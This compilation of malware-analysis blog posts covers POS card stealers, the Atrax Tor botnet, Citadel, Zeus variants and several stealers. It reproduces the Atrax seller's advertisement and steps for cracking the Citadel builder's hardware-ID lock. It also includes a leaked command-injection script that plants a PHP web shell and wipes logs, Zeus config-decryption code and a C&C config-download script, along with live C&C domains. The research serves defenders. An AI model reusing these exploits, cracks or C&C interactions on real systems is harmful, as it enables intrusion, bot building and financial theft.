
Gameboy hacking

Not malware related, but I recently played with my Gameboy, more specifically the electronics inside. Some people on Skype told me to make a post, so here we go... :)
At first I just hacked my cartridge by replacing the chip containing the ROM with an EPROM containing a demoscene production.
I did that to make a series of videos and enjoy the GB scene on real hardware.

I later frontlighted my Gameboy:

Then did a cartridge LED mod:

And finally hacked the ROM of my games, due to a 'challenge':
A French guy known as furrtek made a homebrew game and sold 80 physical cartridges; the goal was to dump the ROM and remove the protections:

I followed the steps of Alex, who has done impressive work on Gameboy electronics:
http://www.insidegadgets.com/2011/03/19/gbcartread-arduino-based-gameboy-cart-reader-%E2%80%93-part-1-read-the-rom/

Desoldering the cartridge adapter from one of my Gameboys (and that was a very long operation....):

Building my new cartridge adapter:

Assembling:

It works!

GBC shield (to avoid the wire jungle):

Some 'pirate' cartridges I bought (commentary in French, sorry):

Never thought it would be so much fun to play with a Gameboy.

Win32/Spy.POSCardStealer.O and unknown POS Sniffer

Finally some new stuff (hmm, no).
Let's talk about Win32/Spy.POSCardStealer.O, identified by ESET.
It's pretty lame, but let's look at it anyway.

In the first procedure the malware registers a key in HKLM under 'HDebugger':

And starts to search for track 2 data:

Then it calls the C&C (hoqou.su/forum.php):
• dns: 1 ›› ip: 62.173.149.140 - adresse: HOQOU.SU

Sleeps for 120000 ms (2 minutes):

And goes back into the track 2 search procedure.
When something is finally found, the malware takes the PID of the program, the process name and the memory address:
Then sends it to the C&C...

POST request example:
%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A
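As an added example (my code, not part of the original post), here is a small parser for the exfiltration format shown above: it URL-decodes the body, pulls out PID, process name, memory address and the track 2 string, and runs a Luhn check on the PAN so an analyst can separate real card data from test values when reviewing captured C&C traffic. The record layout and the sample body come from the post; the field split after the '=' assumes the standard track 2 order (PAN, YYMM expiry, service code, discretionary data).

```python
import re
from urllib.parse import unquote

# Constructed sample: the URL-encoded POST body quoted above, exactly as the bot sends it.
SAMPLE_POST = ("%5BPID%201224%20%28MSR.exe%29%5D%0D%0A%20ADDR%20000B2F90%3A%20"
               "%224111111111111111%3D13071010000000000666%22%0D%0A%5BEOF%5D%0D%0A")

# One exfil block decodes to:  [PID <pid> (<process>)]\r\n ADDR <hex>: "<track2>"\r\n[EOF]\r\n
PID_RE = re.compile(r'^\[PID (\d+) \(([^)]*)\)\]$')
ADDR_RE = re.compile(r'^\s*ADDR ([0-9A-Fa-f]+): "([^"]*)"$')
# Track 2 (ISO 7813): PAN, '=', YY, MM, 3-digit service code, discretionary data.
TRACK2_RE = re.compile(r'^(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)$')

def luhn_ok(pan):
    """Luhn check on a PAN; the sniffer never validates, so this weeds out junk hits."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0

def mask_pan(pan):
    """Keep BIN and last four only, which is all that should land in an IR report."""
    return pan[:6] + '*' * (len(pan) - 10) + pan[-4:]

def parse_exfil(body):
    """Return one dict per ADDR line of a decoded POSCardStealer exfiltration body."""
    records = []
    pid, proc = None, None
    for line in unquote(body).split('\r\n'):
        m = PID_RE.match(line)
        if m:
            pid, proc = int(m.group(1)), m.group(2)
            continue
        m = ADDR_RE.match(line)
        if not m:
            continue  # blank lines and [EOF] markers
        addr, track = int(m.group(1), 16), m.group(2)
        rec = {'pid': pid, 'process': proc, 'address': addr,
               'track2': track, 'valid_track2': False}
        t = TRACK2_RE.match(track)
        if t:
            pan, yy, mm, svc, disc = t.groups()
            rec.update({'valid_track2': True, 'pan_masked': mask_pan(pan),
                        'expiry': '20%s-%s' % (yy, mm), 'service_code': svc,
                        'discretionary': disc, 'luhn_ok': luhn_ok(pan)})
        records.append(rec)
    return records

if __name__ == '__main__':
    for rec in parse_exfil(SAMPLE_POST):
        print(rec)
```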

This malware can't receive orders and has no special mechanism.
In another sample I found another domain: rolex216.8s.nl/go/go.php
• dns: 1 ›› ip: 41.223.53.155 - adresse: ROLEX216.8S.NL

This malware was downloaded by a downloader that now downloads another malware which brute-forces WordPress sites (maybe I'll talk about this one soon).

Still on POS malware, a 'new' threat (detected only with generic signatures) appeared.
https://www.virustotal.com/fr/file/746cb8cf77b0b00f14c424731948d8fc13378978d193d75f944b12c25e98e0e2/analysis/1376958328/
I've had this sample since August, from a guy who found it on his POS systems.
In 3 months nobody has written an accurate signature.

At first it creates two directories, 'System\Hidden', inside %APPDATA%\Microsoft\Windows

Does a directory test to know where the executable was launched from:

Copies the EXE and launches the copy:

A registry key "Svchost-Windows-Redquired" is created for persistence

Enters a procedure to remove the original file:
/c del C:\DOCUME~1\ADMINI~1\Bureau\svchost.exe >> NUL
And as expected sends an exit code right after...

So what does the fresh copy inside the 'good' folder do?
First it takes the jump, due to the directory test.

In the procedure it computes a string based on GetSystemFileTime, then starts to enumerate processes.
It opens them one by one, reads the memory and looks for track 2 in a subroutine.
Usual stuff.
It searches by pattern on the second part of track 2: '=13', '=14', '=15', etc. (the expiry-year digits that follow the '=' separator).

A file 'Sys.dll' is created:
timestamped with
(encoded)
And written:

Sleeps for 450000 ms (7 1/2 minutes)

If a dump is found, the dump is encoded:
And written to Sys.dll.

Then the dumps are sent one by one to the C&C:

http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/?update=daily&random=563245325050324532495458495358
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/redirect.php
http://mcsup.cc/8edf4bc26f9c526ff846c9068f387dac/website.php
5.9.96.235
The MD5 hash '8edf4bc26f9c526ff846c9068f387dac' is the hash of 'zabeat'

Win32/Atrax.A

Atrax is a TOR botnet; you can read about it in the excellent post by Aleksandr.
Someone on kernelmode.info recently posted a fresh sample:
MD5: 44a6a7d4a039f7cc2db6e85601f6d8c1

Fun thing too, the coder left a message:
"Nice blog post ESET 2013/07/24 Greetz to KernelMode.info"

Atrax advertising:
Programming language: C (No C++!)
OS: Win XP - 8.1 (all x86/x64)
Admin rights required: No
Special: Tor Integration, spawns no process -> x64/x86 Process injection, this is the first public bot which supports windows 8!
File size: ~1,2 MB (because of Tor integration and x64/x86 Code), you can get a free assembler web downloader ~2KB

Why Tor?
The bot communicates only via Tor with your panel. With Tor you can get a really nice anonymous Botnet. It is almost impossible (well, theoretically it is possible, but Silkroad is still online, so don’t worry) to get your server ip and put your server down. You get a Tor onion domain and this domain cannot be blacklisted (lasts “forever”). So to sum up: If you don’t do any configuration mistakes, your botnet will probably last very long.
You need a VPS or a dedicated server to host this tor botnet, because you need to set up a hidden service. Because of tor the botnet is consuming more hardware resources than typical botnets. Probably it is not possible to get a 10 Dollar/year VPS and trying to host over 1k victims.

Setting up hidden service instructions:
- https://www.torproject.org/docs/tor-hidden-service.html.en
- http://kendildonic.wordpress.com/2011/08/03/build-a-tor-hidden-service-onion-web-site-with-a-cheap-vps/
- A little manual to set it up on debian based linux systems is included

The bot consist of a core and various plugins/addons. Each plugin/addon costs some money. Every plugin also communicates over tor.
(If somebody is interested in developing a plugin -> contact me)

Some basic features:
- Autostart, Persistence
- x86/x64 Code, x86/x64 Injection with Heavens Gate technique
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
- Doesn't use suspicious windows apis like GetProcAddress/GetModuleHandle
- Plugins are saved to disk with AES-128-CBC encryption (random key)
- Communication over tor is already encrypted, so no extra communication encryption
- Every Plugin and the core is watermarked. Leak -> No updates/support. (All updates are free)
- Everything UNICODE

Panel:
- http://www0.xup.in/exec/ximg.php?fid=11907674
- http://www0.xup.in/exec/ximg.php?fid=68935688
- http://www0.xup.in/exec/ximg.php?fid=20127007
- http://pixs.ru/showimage/2ci7png_4898170_9693543.png
- http://pixs.ru/showimage/ekahjpg_4965220_9693535.jpg
- Login Bruteforce protection, panel will be locked after x failed logins (captchas are not secure)
- SQL-Injection proof
- No IonCube

Standard Features:
- Kill
- Update
- Download (over Tor), Execute (Commandline-Parameter allowed)
- Download (over Tor), Execute (Commandline-Parameter allowed) in memory (Your file doesn't need to be FUD)
- Install Plugin
- Installation List (A list with all installed applications)

The Core has only a few functions, but they are already pretty useful. Yes you can e.g. start your own uncrypted Bitcoin Miner with the "Download over Tor, Execute Memory" function.
I will give you a plain bitcoin miner exe or just use the binaries you can find in this board.

A bot addon is integrated in the main EXE, so no extra file.
A bot plugin is not integrated, you will receive extra file(s).

Addon - DDOS:
- Full IPv6 + IPv4 support.
- UDP Flood
- TCP Flood
- TCP Connect Flood (Some idiots call this "SYN-Flood")
- HTTP Slowloris (based on http://ckers.org/slowloris/)
- HTTP RUDY (R-U-Dead-Yet, based on https://code.google.com/p/r-u-dead-yet/)
- HTTP File Download (Good if your target hosts a file >1MB)
- If you need some more methods, contact me.

Addon - Form Grabber:
- Firefox, Internet Explorer x86/x64, Chrome SSL HTTP POST Grabber
- Anti-Hook Engine (Removes hooks from other bots)
- Own Hook Engine (No copy/paste crap)
- Tested with Browser: Internet Explorer v7/v9/v10, Firefox v11/v21/v22/v24, Chrome v27/v30
- Tested with Website: PayPal, Amazon, Bitcoin.de, Mt. Gox, eBay, Googlemail, vBulletin Boards
- SPDY v3 support
- IE 7/8/9/10 (Enhanced) Protected Mode Support
- Grabs only important POST Form Requests.
- Searches automatically for Username/Password/Email and CC (Possible CC will be displayed in panel)
- Screenshot: http://www0.xup.in/exec/ximg.php?fid=24471254

Addon - Socks 5 Reverse Socks:
- You need a 2nd VPS/dedicated Server to keep your main C&C server secure!
- Server is a Java application to achieve complete platform independence -> All OS supported!
- Socks 5 with and without authentication
- Controlled via tasks
- You can run different instances of the proxy server for different purposes
- Works on all clients because it is a reverse socks (No SSH crap!)
- Panel screenshot: http://www0.xup.in/exec/ximg.php?fid=15537396

Plugin - Stealer:
- Steals all current browser versions.
- Steals: CHROME, FIREFOX, SAFARI, INTERNET EXPLORER, OPERA, FILEZILLA, PIDGIN, JDOWNLOADER v1 + v2, GIGATRIBE, THUNDERBIRD, WINDOWSKEY, FLASHFXP, ICQ, MSN, WINDOWS LIVE, OUTLOOK, PALTALK, STEAM Username Only, TRILLIAN, MINECRAFT, DYNDNS, SMARTFTP, WSFTP, Bitcoin Wallet (Armory, Bitcoin-Qt, Electrum, Multibit)
- If you need something more -> ask me.
- Special: JDownloader v1/v2, Bitcoin Wallet Stealer (whole wallet.dat will be uploaded), IE10 + IE11 support!

Plugin - Coin Mining (Experimental)
- Bitcoin / Litecoin Miner
- Hash Rate displayed in panel
- Based on Ufasoft Miner v0.68 (updated regularly)
- Mining with tasks http://www0.xup.in/exec/ximg.php?fid=60729560

Price:
Core: $250 (Launch price! Read information below)
Addon DDOS: $90
Addon Form Grabber: $300
Addon Reverse Socks: $400
Plugin Stealer: $110
Plugin Coin Mining: $140 (Experimental)

Payment only with Bitcoin. Market price from https://www.bitcoin.de "Current Bitcoin price" - 10%, because of high exchange rate fluctuations!
Bugfix Updates and Support is free of course.
Please keep in mind: This Core Price will be higher soon. This Bot is currently in beta stage, so probably there are still some bugs. Get it now pay less + maybe bugs, wait: pay more and bot is stable

- Builder available?
No, your tor domain will last forever if you don't lose the RSA key.

- Is the bot bin FUD?
No, you need a crypter. This bot should work with all crypters, but .NET Crypters are special. Tell me what .NET crypter you want to use and we will see.
I can give you a free .NET Crypter to get you started!

- The bot is too expensive, noob!
I don't care if you think it is too expensive.

- The filesize sucks, noob!
I don't care.

Alright, let's have a look at the C&C of the sample posted on kernelmode.
estrgnejb7sjly7p.onion >> 46.183.219.xxx
The httpd is not properly configured to run with the IP.
So, let's have a look from TOR.

Login:

Statistics:

Plugin statistics:

Spreader statistic:

Bots:

Bot legend:

Bot information:

AtraxStealer plugin logs:

Formgrabber plugin logs:

Formgrabber plugin logs detail:

Plugins:

Tasks:

Create a new task:

Task setting for 'Download & Execute':

Task execution:

Edit a task:

Settings:

Win32/BruteForce.WP

DrWeb published news about this malware in August; they know it as 'Trojan.WPCracker.1'.
And more recently ~ 1e8cd0f0f1702820c870302520bc0176.

This executable communicates with a C&C at dorblu99.net
Let's have a closer look.

Login:

Main:

Bot info:

Broken wordpress:

Statistics:

Add domains:

Add admin panels:

Add logins:

Add passwords:

Add module for jm(zip):

Add module for wp(zip):

Add shell jm(php):

Cron brute:

Ban list:

Logs:

Domains list (downloaded by the malware to know which WordPress sites it should brute-force):
36k URLs.

Roman of abuse.ch has also written an interesting post about this threat.

How the protection of Citadel got cracked

Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server).
If you want to read more about Backconnect on Citadel, the link g4m372 shared is cool: http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html

I searched for this file by downloading a random mirror of the leaked Citadel package, hoping to find it inside.
In the end the file wasn't in the leaked archive, but it had already been grabbed by various malware trackers.
MD5: 50A59E805EEB228D44F6C08E4B786D1E
Malwarebytes: Backdoor.Citadel.BkCnct

And since I've downloaded the leaked Citadel package... let's look at the Builder.
It could be interesting to make a post about it.

Citadel.exe: a33fb3c7884050642202e39cd7f177e0
Malwarebytes: Hacktool.Citadel.Builder
"ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."

This file is packed with UPX:

Same for the Citadel Backconnect Server and the Hardware ID generator.
But when we try to unpack it with UPX we get an exception:

UPX tells us that there is something wrong with the file header: aquabox used a lame trick.
With a hex editor we can clearly see that there is a problem with the DOS header:

We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.
e_lfanew is null, so let's fix it at 18h with 0x40.
Miracle:

Same trick for the Hardware ID Calculator and the Citadel Backconnect Server; I'll get back to these two files later.
Now that we have clean code we can know the Time/Date Stamp, view the resources, and more interesting: see how Citadel is protected.
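An added example (my code, not the author's) that automates the header check the post walks through by hand: parse the IMAGE_DOS_HEADER, flag the two fields that unpackers and the Windows loader rely on, and write the sane values back. It assumes the standard header layout (e_lfarlc at offset 0x18, e_lfanew at offset 0x3C) and uses a constructed minimal PE stub in place of the real builder; the loader only reads e_lfanew, which is why a file with a zeroed 0x18 still runs while tools that sanity-check e_lfarlc refuse it.

```python
import struct

E_LFARLC_OFF = 0x18   # file address of the relocation table; 0x40 or more in a normal PE
E_LFANEW_OFF = 0x3C   # file offset of the 'PE\0\0' signature; what the Windows loader follows
PE_SIG = b'PE\x00\x00'

def inspect_dos_header(data):
    """Return the two offsets plus a list of anomalies, without modifying the buffer."""
    findings = []
    if len(data) < 0x40:
        return {'findings': ['file shorter than a DOS header']}
    e_magic = data[:2]
    e_lfarlc = struct.unpack_from('<H', data, E_LFARLC_OFF)[0]
    e_lfanew = struct.unpack_from('<I', data, E_LFANEW_OFF)[0]
    if e_magic != b'MZ':
        findings.append('e_magic is %r, not MZ' % e_magic)
    if e_lfarlc < 0x40:
        findings.append('e_lfarlc %#x < 0x40: unpackers treat this as a DOS-only EXE' % e_lfarlc)
    if e_lfanew < 0x40 or e_lfanew + 4 > len(data):
        findings.append('e_lfanew %#x does not point inside the file' % e_lfanew)
    elif data[e_lfanew:e_lfanew + 4] != PE_SIG:
        findings.append('no PE signature at e_lfanew %#x' % e_lfanew)
    return {'e_lfarlc': e_lfarlc, 'e_lfanew': e_lfanew, 'findings': findings}

def locate_pe_signature(data):
    """Fallback when e_lfanew is bogus: first 'PE\\0\\0' at a 4-byte-aligned offset past the DOS header."""
    pos = data.find(PE_SIG, 0x40)
    while pos != -1 and pos % 4:
        pos = data.find(PE_SIG, pos + 1)
    return pos

def repair_dos_header(data):
    """Rewrite e_lfanew and, if needed, e_lfarlc so UPX and PE parsers find the real headers again."""
    buf = bytearray(data)
    pe_off = locate_pe_signature(data)
    if pe_off == -1:
        raise ValueError('no PE signature found; not a PE file')
    struct.pack_into('<I', buf, E_LFANEW_OFF, pe_off)
    if struct.unpack_from('<H', buf, E_LFARLC_OFF)[0] < 0x40:
        struct.pack_into('<H', buf, E_LFARLC_OFF, 0x40)
    return bytes(buf)

def build_sample(tampered):
    """Constructed 64-byte DOS header followed by a PE signature and a zeroed COFF header."""
    hdr = bytearray(0x40)
    hdr[:2] = b'MZ'
    struct.pack_into('<H', hdr, E_LFARLC_OFF, 0 if tampered else 0x40)
    struct.pack_into('<I', hdr, E_LFANEW_OFF, 0 if tampered else 0x40)
    return bytes(hdr) + PE_SIG + bytes(20)

if __name__ == '__main__':
    broken = build_sample(tampered=True)
    print(inspect_dos_header(broken)['findings'])
    print(inspect_dos_header(repair_dos_header(broken))['findings'])  # []
```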

Viewing the strings already gives us a good insight:
PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...

But we don't even really need to waste time trying to understand how the generation is done.
Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2).
At the end you will be here; this routine finalises your HID:

From another side, you can also have a look at the Hardware ID Calculator.

I had a problem with this file: the first layer was an SFX archive:

Malware embedded (stealer):


Conclusion: Don't rush on leaked stuff.

Alright, now that you have extracted/unpacked the good HID Calculator you can open it in Olly.
The code is exactly the same as the one in the Citadel Builder, so it may help to locate the calculation procedure in the builder, although it's really easy to locate.

That was just a short parenthesis; back to the builder: after the generation ends you will have multiple occasions to view your HID on the stack, like here:
And the crucial part starts here.

When the Citadel package of Citab got leaked (see this article for more information) an important file was also released:

The HID of the original machine that was running the builder, so you just have to replace your HID with this one, just like this:

And this is how the protection of Citadel becomes super weak and can generate working malware.
Now you just have to do a code cave or inject a DLL to modify it permanently; child's play.

The problem every cracker was facing with leaked Citadel builders was finding the good HID key.
Citadel builders that were previously leaked weren't leaked with the HID key.
e.g.: vortex1772_second - 1.3.5.1

And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside; that's why, when the package got leaked with the correct HID, an easy way to crack the builder appeared.
Without the good HID you can still brute-force it till you break the key, but this is much harder and time-consuming; that solution would also be a greater achievement and more respected as a scene release.

To finish, let's get back to the Citadel backconnect server that was requested on kernelmode.info

This script was also leaked with the Citab package:


It's for Windows boxes, and it's super secure... oh wait..
# Python 2 script, as leaked with the package (spacing restored from the scraped copy).
import urllib
import urllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b' : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '">> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    return urllib.urlopen(url).getcode() == 200

def cleanLogs(url):
    delete = {
        'delete' : ''
    }
    # the leaked script used the global URL here instead of its own parameter
    request(url + 'control.php', delete, 'POST')

URL      = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD  = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
    print '[-]', FILENAME, 'not found...'
else:
    print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'

In brief, happy new year guys :)

Jolly Roger Stealer

Friend Kafeine has already done a post on it, although someone recently sent me a URL on my cybercrime tracker.. I give a f%$k
• dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE


Bot statistic:
CPU "Arhitecture"

Task:

Search module:

HTTP:

Mail:

Create task:

Task statistic:

I haven't looked at a sample because I don't have one, but it sounds very lame, like Plasma HTTP, which grabs everything without checking if there is already a duplicate.

Troj/WowSpy-A

Recently a malware that targets World of Warcraft got identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.
Yes, this is another post about password-stealer malware...

There is no option to retain the password in the WoW client.

The method used to spread this malware is fake websites leading to malicious downloads.
The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.

Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW


Blizzard released a statement about this new threat:

I don't know how the DLL works for the moment (at least not much).
My debugger has some stability issues when handling wow.exe, but I'll get back to this; the mechanism seems interesting (and they even use OutputDebugString!).

Network traffic after logging in:

C&C (in Chinese):

Compromised accounts:

That's all for the moment :)

Decoding Zeus 2.9.6.1 dynamic config

I had a look at the Zeus builder that was released by the MMBB guy on exploit.in, and finally decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version uses AES instead of RC4 and can interact with the latest version of Firefox.
Anyway, it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of processes:
About the panel: the released version requires the IonCube loader (nvm, the gate code can be recovered easily)

Now let's view an example of a report from the modules, keylog+screenshot:


Part of the static config (in plain text in the generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small piece of code, because it's easier to understand:
<?php
    // AES-128 (Rijndael-128) in ECB mode; the key is the raw MD5 of the hard-coded string.
    function decode($data, $key){
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND); // ignored by ECB, but mcrypt wants one

        mcrypt_generic_init($td, $key, $iv);
        $data = mdecrypt_generic($td, $data);
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);

        return $data;
    }

    // Zeus VisualDecrypt: walking backwards, XOR each byte with the one before it.
    function visualDecrypt(&$data){
        $len = strlen($data);

        if ($len > 0)
            for ($i = $len - 1; $i > 0; $i--)
                $data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
    }

    $data    = file_get_contents('config.bin');
    $key     = md5('hasd7h12g1', true);   // binary digest: 16 bytes = AES-128 key
    $decoded = decode($data, $key);

    visualDecrypt($decoded);

    $size = strlen($decoded);

    // hand the result back as a file download
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . $size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');

    echo($decoded);

    exit;
?>

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test the WebInject yourself, I usually use this config:
set_url http://requesttests.appspot.com* GP
data_before
</body>
data_end

data_inject
<center><img src="http://temari.fr/webinject.png" alt="Injected!"></center>
data_end

data_after
data_end

/facepalm

Plasma HTTP

Advert:

Login:

Online bot:

offline bots:

Commands:

Statistics:

Logs:

Yeah, take this lame article as tongue-in-cheek; I only talk about Plasma because I promised on IRC to write something today.

I'm not dead, but there's nothing interesting to review for the moment, only crappy bots.
That's also one of the reasons I haven't talked about JackPos and all the rest.
I have some interesting things, but they're too sensitive for the moment, and when that's not the reason, it's because people asked me not to talk about a subject because they want to cover it 'first' for their company but finally write nothing, so I'm still waiting (you know who you are).
e.g.: ZeusVM, I wanted to talk about the weird version that appeared some months ago,
a version that downloads from sites (over SSL and fastflux) a picture with a config embedded inside.. but well, fuck it now.
As I already said in a previous article, I may appear inactive but I'm not so inactive.
I've recently done this; I still continue to post malware and break things, but without necessarily talking about it, or only briefly, like for jackTrash, and today: PlasmaTrash, and iTrashing.
I still continue to make trashy videos, show trashy things at my hackerspace and talk about trash on IRC (yeah, that's a lot of trash).
So for the moment, I just wait and see...

Zeus 1.1.3.4

RSA FirstWatch recently threw me a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made, but it seems to be nothing more than a standard Zeus v2.
But wait, it communicates over SSL and has a new kind of HTTP request pattern:

Fiddler:

Config download in python:
import urllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')   # bot ID
request.add_header('X_OS', '510')                        # OS version
request.add_header('X_BV', '1.1.3.4')                    # variant version
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'wb').write(page)   # binary mode: the config is a raw blob, not text

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The server's answer has X_ID as a cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream
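As an added example (my code, not from the original post), a small detector for the request pattern just described: it parses raw HTTP request headers and scores the X_ID/X_OS/X_BV combination, so this variant can be matched on a proxy capture rather than on a file hash. Both requests are constructed from the headers and values quoted above; the hit threshold is my own choice, not something the post documents.

```python
import re

# Constructed samples: the request the snippet above sends, and a benign request for contrast.
ZEUS_REQUEST = (
    "GET /?ajax HTTP/1.1\r\n"
    "Host: secureinformat.com\r\n"
    "Accept: */*\r\n"
    "X_ID: 14E255CE7875768FBC303C10\r\n"
    "X_OS: 510\r\n"
    "X_BV: 1.1.3.4\r\n"
    "Control: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;\r\n"
    "\r\n")
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Accept: */*\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n")

# Per-header checks: upper-cased name, regex the value must match, short reason for the report.
INDICATORS = [
    ('X_ID', re.compile(r'^[0-9A-F]{24}$'), 'bot id: 24 upper-case hex chars'),
    ('X_OS', re.compile(r'^\d{3}$'), 'OS version encoded as 3 digits'),
    ('X_BV', re.compile(r'^\d+(\.\d+){3}$'), 'four-part variant version'),
    ('CONTROL', re.compile(r'^no-cache$'), 'mangled Cache-Control header'),
]

def parse_request(raw):
    """Split a raw HTTP/1.x request into (request line, {NAME: value}); names are upper-cased."""
    head = raw.split('\r\n\r\n', 1)[0]
    lines = head.split('\r\n')
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers

def classify_request(raw, min_hits=3):
    """Return matched indicators and a verdict; min_hits is an assumed threshold."""
    request_line, headers = parse_request(raw)
    hits = [reason for name, pattern, reason in INDICATORS
            if name in headers and pattern.match(headers[name])]
    return {
        'request_line': request_line,
        'bot_id': headers.get('X_ID'),
        'variant': headers.get('X_BV'),
        'hits': hits,
        'verdict': 'zeus-1.1.3.x-like' if len(hits) >= min_hits else 'benign',
    }

if __name__ == '__main__':
    for raw in (ZEUS_REQUEST, BENIGN_REQUEST):
        print(classify_request(raw))
```

Header names with underscores are also worth a separate alert on their own: most reverse proxies drop or reject them, so legitimate clients rarely send any.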

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
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
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, again nothing new: regular Zeus v2.
Once unpacked, we can see that the malware targets German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky; Perkel is an Android malware that was sold by Perkele (this guy was later banned from underground forums for scamming, but that's another story)

Sort of Fake AV:

